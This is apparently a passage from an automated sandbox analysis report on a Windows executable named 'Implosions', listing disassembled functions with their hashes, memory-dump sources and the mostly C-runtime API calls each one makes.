              Function 004073A0 Relevance: .6, Instructions: 633COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
              • Instruction ID: 17d22deff8d32e931318445bbea846c6b698fa6fcc44f6923348d96d7e24b863
              • Opcode Fuzzy Hash: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
              • Instruction Fuzzy Hash: 0A329E70A087029FD318CF29C98472AB7E1BF84304F148A3EE89567781D779E955CBDA
              Function 05D64ED0 Relevance: .5, Instructions: 534COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cb09f19ac7b889c1c886bb29050a0d3e7470f1b649b3c481f9037949f1f00bb4
              • Instruction ID: 04ce333188ffb89b2882b5db2ed635ce43689d9ee0d9d2fa81dd8b8d295a4092
              • Opcode Fuzzy Hash: cb09f19ac7b889c1c886bb29050a0d3e7470f1b649b3c481f9037949f1f00bb4
              • Instruction Fuzzy Hash: BD321D30E50B0A96EB21DA64CC41BD9F371BF9A700F60C746F6587A580EBB0B6D58B90
              Function 00406CA0 Relevance: .4, Instructions: 401COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
              • Instruction ID: cc67e10771130af0a5279b37c8f7fa75a2653c997645fd1ae8a0b8309c7f2627
              • Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
              • Instruction Fuzzy Hash: 48E1D6306083514FC708CF28C99456ABBE2EFC5304F198A7EE8D68B386D779D94ACB55
              Function 05CE8798 Relevance: .4, Instructions: 393COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77cdf1339ee5f84181c276ad54d5aaa8063b6ec41addf0e9ac0b685167beb2c6
              • Instruction ID: 679ce2e7512b98843f22d9b0bd0a3d4b678ed9335db438d4a250dc406977e369
              • Opcode Fuzzy Hash: 77cdf1339ee5f84181c276ad54d5aaa8063b6ec41addf0e9ac0b685167beb2c6
              • Instruction Fuzzy Hash: A3C12E647803289BD648E6BC49A477BA89F9BCC740F544C99510EDB3E8DCAACD8703F5
              Function 05CA35A1 Relevance: .4, Instructions: 373COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 91298c52a18c14a3781fcf4891053eeda772de2a0ea36d5ea947253738671500
              • Instruction ID: c4abcac5009518a92453701042b9111ce0e7da46fa19936c39d35f791d3dc3ac
              • Opcode Fuzzy Hash: 91298c52a18c14a3781fcf4891053eeda772de2a0ea36d5ea947253738671500
              • Instruction Fuzzy Hash: B5D16F713406169FD708EF78C994B6ABBA6BF88304F104968E509CB7A4DF31EC42CB90
              Function 05CA0810 Relevance: .3, Instructions: 321COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b5b8844f025b39f9e3d036f956406f3e0bc02414e022576ebf34a4a721c3fd44
              • Instruction ID: 461cd3059e82d3869e013e1abcbef10828ae7d212bc0b7f48e15ec6a0828a00c
              • Opcode Fuzzy Hash: b5b8844f025b39f9e3d036f956406f3e0bc02414e022576ebf34a4a721c3fd44
              • Instruction Fuzzy Hash: 92B19D31B402059FDB149B79C498B6ABBE7FFC8344F148868E906DB3A4DE71DD428B81
              Function 05CE8788 Relevance: .3, Instructions: 265COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8fed8c68aa2618738f4cd83c2fb1207fdcc3e4c500e15e6c7a6d972c789d2a7e
              • Instruction ID: eb1795547d88756098495c954d9e2d4f362429b4c7e7877ec5aa891dd7978e5e
              • Opcode Fuzzy Hash: 8fed8c68aa2618738f4cd83c2fb1207fdcc3e4c500e15e6c7a6d972c789d2a7e
              • Instruction Fuzzy Hash: AE711C587C03289BD248A2BD49A477B949F9BCC740F544C99520EEB3E8DCAACD8703F5
              Function 00402B90 Relevance: .2, Instructions: 212COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
              • Instruction ID: 74c1b90a01db230de662c72faab58802bb742d928f34651097fec506a9751401
              • Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
              • Instruction Fuzzy Hash: 15717072A9155347E39CCF5CECD17763713DBC5351F49C23ACA025B6EAC938A922C688
              Function 004028B0 Relevance: .2, Instructions: 184COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
              • Instruction ID: e93c334361593eb17f37b37ed9e80cdb2c00b1b1e1af3e0e9a736190e966ddef
              • Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
              • Instruction Fuzzy Hash: 4A615E3266055747E391DF6DEEC47663762EBC9351F18C630CA008B6A6CB39B92297CC
              Function 00401650 Relevance: .1, Instructions: 111COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
              • Instruction ID: 39afabd8a370e1aacf823bb5b0eb141e0e266d105c364ee31248ba7b153c19f0
              • Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
              • Instruction Fuzzy Hash: 2851F94400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77
              Function 00402F20 Relevance: .1, Instructions: 103COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
              • Instruction ID: cff114a85fcb8f5deb46d81d22c4208fa3965af46b01a687ebeadebabb5a60ab
              • Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
              • Instruction Fuzzy Hash: 9A31D8302052028BE738CE19C954BEBB3B5AFC0349F44883ED986A73C4DABDD945D795
              Function 00402F89 Relevance: .1, Instructions: 77COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
              • Instruction ID: 40597224e526abc728bb10992f322fa75c91b34d76fbbe6bc80328d1c420bfc2
              • Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
              • Instruction Fuzzy Hash: F321923170520247EB68C929C9547ABB3A5ABC0389F48853EC986A73C8DAB9E941D785
              Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
              • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,022318C0), ref: 004170C5
              • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
              • _malloc.LIBCMT ref: 0041718A
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
              • _malloc.LIBCMT ref: 0041724C
              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
              • __freea.LIBCMT ref: 004172A4
              • __freea.LIBCMT ref: 004172AD
              • ___ansicp.LIBCMT ref: 004172DE
              • ___convertcp.LIBCMT ref: 00417309
              • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
              • _malloc.LIBCMT ref: 00417362
              • _memset.LIBCMT ref: 00417384
              • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
              • ___convertcp.LIBCMT ref: 004173BA
              • __freea.LIBCMT ref: 004173CF
              • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
              • String ID:
              • API String ID: 3809854901-0
              • Opcode ID: b820e78b463918eed32479816903fc70d8532b7c557c67349a3712e4f0fad1ae
              • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
              • Opcode Fuzzy Hash: b820e78b463918eed32479816903fc70d8532b7c557c67349a3712e4f0fad1ae
              • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
              Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
              Download Yara Rule
              APIs
              • _malloc.LIBCMT ref: 004057DE
                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
              • _malloc.LIBCMT ref: 00405842
              • _malloc.LIBCMT ref: 00405906
              • _malloc.LIBCMT ref: 00405930
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: _malloc$AllocateHeap
              • String ID: 1.2.3
              • API String ID: 680241177-2310465506
              • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
              • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
              • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
              • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
              Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
              • String ID:
              • API String ID: 3886058894-0
              • Opcode ID: 61b9ef8a6f765c58139a33a573ef994292dae8fcc9e916c915b81b6d9ebba236
              • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
              • Opcode Fuzzy Hash: 61b9ef8a6f765c58139a33a573ef994292dae8fcc9e916c915b81b6d9ebba236
              • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
              Function 0040C73D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON
              Download Yara Rule
              APIs
              • __lock_file.LIBCMT ref: 0040C6C8
              • __fileno.LIBCMT ref: 0040C6D6
              • __fileno.LIBCMT ref: 0040C6E2
              • __fileno.LIBCMT ref: 0040C6EE
              • __fileno.LIBCMT ref: 0040C6FE
                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
              • String ID: 'B
              • API String ID: 2805327698-2787509829
              • Opcode ID: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
              • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
              • Opcode Fuzzy Hash: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
              • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
              Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • __getptd.LIBCMT ref: 00414744
                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
              • __getptd.LIBCMT ref: 0041475B
              • __amsg_exit.LIBCMT ref: 00414769
              • __lock.LIBCMT ref: 00414779
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
              • String ID: @.B
              • API String ID: 3521780317-470711618
              • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
              • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
              • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
              • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
              Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • __getptd.LIBCMT ref: 00413FD8
                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
              • __amsg_exit.LIBCMT ref: 00413FF8
              • __lock.LIBCMT ref: 00414008
              • InterlockedDecrement.KERNEL32(?), ref: 00414025
              • InterlockedIncrement.KERNEL32(02231660), ref: 00414050
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
              • String ID:
              • API String ID: 4271482742-0
              • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
              • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
              • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
              • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
              Function 0040FA58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: __calloc_crt
              • String ID: P$B$`$B
              • API String ID: 3494438863-235554963
              • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
              • Instruction ID: 4bdca0f49684ef71ac3198dcc3f656e5d5ce7fed137673697bf40858e87bd1f9
              • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
              • Instruction Fuzzy Hash: 6011A3327446115BE7348B1DBD50F662391EB84728BA4423BE619EA7E0E77CD8864A4C
              Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: AddressHandleModuleProc
              • String ID: IsProcessorFeaturePresent$KERNEL32
              • API String ID: 1646373207-3105848591
              • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
              • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
              • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
              • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
              Function 004146FA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • ___addlocaleref.LIBCMT ref: 0041470C
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(00000001), ref: 004145E4
